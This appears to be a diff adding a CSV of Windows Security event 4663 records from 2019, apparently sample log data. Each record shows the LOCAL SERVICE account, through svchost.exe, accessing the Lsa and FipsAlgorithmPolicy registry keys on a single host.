+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452888
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452887
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452886
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452885
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452884
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452883
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452882
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452881
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452880
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452879
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452878
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452877
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452876
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452875
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452874
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452873
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452872
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452871
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452870
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452869
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452868
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452867
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452866
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452865
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452864
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452863
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452862
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452861
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452860
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452859
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452858
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452857
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452856
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452855
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452854
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x520
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452853
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x468
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452852
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452851
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452850
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x1ac
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452849
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
+2019-03-20T03:35:15.315405+04:00,1553038515.315405,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"
+
+
+
+
+ 4663
+ 0
+ 0
+ 12801
+ 0
+ 0x8020000000000000
+
+
+ 452848
+
+
+
+
+ Security
+ PC01.example.corp
+
+
+
+
+ S-1-5-19
+ LOCAL SERVICE
+ NT AUTHORITY
+ 0x3e5
+ Security
+ Key
+ \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa
+ 0x420
+ %%4432
+
+ 0x1
+ 0x5a8
+ C:\Windows\System32\svchost.exe
+
+"
